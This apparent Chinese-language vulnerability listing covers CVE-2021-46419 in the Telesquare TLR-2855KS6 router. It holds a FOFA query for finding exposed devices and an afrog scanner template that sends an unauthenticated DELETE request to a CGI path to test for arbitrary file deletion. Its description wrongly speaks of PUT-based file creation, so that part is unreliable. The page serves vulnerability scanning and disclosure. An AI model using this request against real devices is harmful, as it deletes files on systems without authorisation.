CVE-2021-46419: Telesquare TLR-2855KS6 - 任意文件删除

日期: 2025-09-01 | 影响软件: Telesquare TLR-2855KS6 | POC: 已公开

漏洞描述

Telesquare TLR-2855KS6 中存在通过 PUT 方法创建未授权文件的漏洞，可允许创建 CGI 脚本。 fofa-query: product=="TELESQUARE-TLR-2855KS6"

PoC代码[已公开]

id: CVE-2021-46419

info:
  name: Telesquare TLR-2855KS6 - 任意文件删除
  author: Momen Eldawakhly (Cyber Guy)
  severity: critical
  description: |
    Telesquare TLR-2855KS6 中存在通过 PUT 方法创建未授权文件的漏洞，可允许创建 CGI 脚本。
    fofa-query: product=="TELESQUARE-TLR-2855KS6"
  reference:
    - https://www.exploit-db.com/exploits/50863
    - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html
    - https://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySp

rules:
  r0:
    request:
      method: DELETE
      path: /cgi-bin/testing_cve.txt
    expression: response.status == 204 && response.headers["server"].icontains("lighttpd")
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-46419.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2021-46418: Telesquare TLR-2855KS6 - 任意文件创建 POC

CVE-2021-46418: Telesquare TLR-2855KS6 - Arbitrary File Creation POC

CVE-2021-46419: Telesquare TLR-2855KS6 - Arbitrary File Deletion POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440） 无POC

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution POC

ShowDoc /server/index.php?s=/api/adminUpdate/download 文件上传漏洞（CVE-2021-36440）无POC